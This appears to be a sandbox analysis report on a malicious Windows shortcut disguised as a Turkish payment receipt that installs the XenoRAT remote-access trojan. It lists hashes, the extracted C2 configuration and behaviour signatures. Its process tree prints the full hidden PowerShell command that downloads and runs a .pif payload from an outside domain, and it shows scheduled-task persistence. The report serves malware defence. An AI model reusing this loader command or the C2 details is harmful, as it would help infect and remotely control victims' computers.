Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03/05/2024, 13:00
Static task
static1
Behavioral task
behavioral1
Sample
Dekontu/Odeme -(Mayis).lnk
Resource
win7-20240221-en
General
-
Target
Dekontu/Odeme -(Mayis).lnk
-
Size
2KB
-
MD5
2ad899ef7b0d361186d8487950b7e167
-
SHA1
151d04d656e68152cc2116b0837331a7df30eb27
-
SHA256
2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618
-
SHA512
2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b
Malware Config
Extracted
https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif
Extracted
xenorat
dns.requimacofradian.site
Xeno_rat_nd8818g
-
delay
60000
-
install_path
appdata
-
port
1243
-
startup_name
uic
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2820 PoWeRShElL.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2820 PoWeRShElL.exe -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
pid Process 2444 screenbiwus.pif 2052 screenbiwus.pif 1600 screenbiwus.pif 2776 screenbiwus.pif 2064 screenbiwus.pif 1512 screenbiwus.pif 2256 screenbiwus.pif 1624 screenbiwus.pif -
Loads dropped DLL 4 IoCs
pid Process 2444 screenbiwus.pif 2444 screenbiwus.pif 2444 screenbiwus.pif 1600 screenbiwus.pif -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2444 set thread context of 2052 2444 screenbiwus.pif 31 PID 2444 set thread context of 1600 2444 screenbiwus.pif 32 PID 2444 set thread context of 2776 2444 screenbiwus.pif 33 PID 2064 set thread context of 1512 2064 screenbiwus.pif 35 PID 2064 set thread context of 2256 2064 screenbiwus.pif 36 PID 2064 set thread context of 1624 2064 screenbiwus.pif 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 748 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2820 PoWeRShElL.exe 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif 2052 screenbiwus.pif -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2820 PoWeRShElL.exe Token: SeDebugPrivilege 2444 screenbiwus.pif Token: SeDebugPrivilege 2064 screenbiwus.pif Token: SeDebugPrivilege 2052 screenbiwus.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2232 wrote to memory of 2820 2232 cmd.exe 29 PID 2232 wrote to memory of 2820 2232 cmd.exe 29 PID 2232 wrote to memory of 2820 2232 cmd.exe 29 PID 2820 wrote to memory of 2444 2820 PoWeRShElL.exe 30 PID 2820 wrote to memory of 2444 2820 PoWeRShElL.exe 30 PID 2820 wrote to memory of 2444 2820 PoWeRShElL.exe 30 PID 2820 wrote to memory of 2444 2820 PoWeRShElL.exe 30 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 2052 2444 screenbiwus.pif 31 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 1600 2444 screenbiwus.pif 32 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 2444 wrote to memory of 2776 2444 screenbiwus.pif 33 PID 1600 wrote to memory of 2064 1600 screenbiwus.pif 34 PID 1600 wrote to memory of 2064 1600 screenbiwus.pif 34 PID 1600 wrote to memory of 2064 1600 screenbiwus.pif 34 PID 1600 wrote to memory of 2064 1600 screenbiwus.pif 34 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 1512 2064 screenbiwus.pif 35 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 2256 2064 screenbiwus.pif 36 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37 PID 2064 wrote to memory of 1624 2064 screenbiwus.pif 37
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Dekontu\Odeme -(Mayis).lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command srms-apr.dat;(new-object System.Net.WebClient).DownloadFile('https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif','screenbiwus.pif');./'screenbiwus.pif';(get-item 'screenbiwus.pif').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif"C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "uic" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmp" /F5⤵
- Creates scheduled task(s)
PID:748
-
-
-
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:1512
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:2256
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:1624
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif4⤵
- Executes dropped EXE
PID:2776
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
243KB
MD5f6839c83a19cfb9112997be29ba02a88
SHA1b558ada6c8f1603b8c700a74afc33bfbb14ac713
SHA25609d6f45a4cf61b2eaf9b715c712d6e61410a7d838b71e31fa4b12c012afb2d90
SHA5120724132c9cbdd1394cc3e17d557c7c82b8e30b34b1adc207f7b77dc498b63e5c03768de88b261bd986cfe18ab8a70ff77c4dabc5b215d58a959287c7f38fdd8b
-
Filesize
1KB
MD5cd6994537023694f4533ff4244156d8a
SHA1b581d11e2cad75bd5b7e440169f423cb18117a40
SHA256b03bd499a8ab96f583f7029110764a3a08ecd976f4e2ec9e7b74c414d20c6707
SHA512f9d3f71138a6af0d0435d3b66b7277a92696050dc3f3fdfb2842f02d8bf2a948342101da4747e74d003c23dd13799d4940496043fad866b9bc2045de54ea9cd0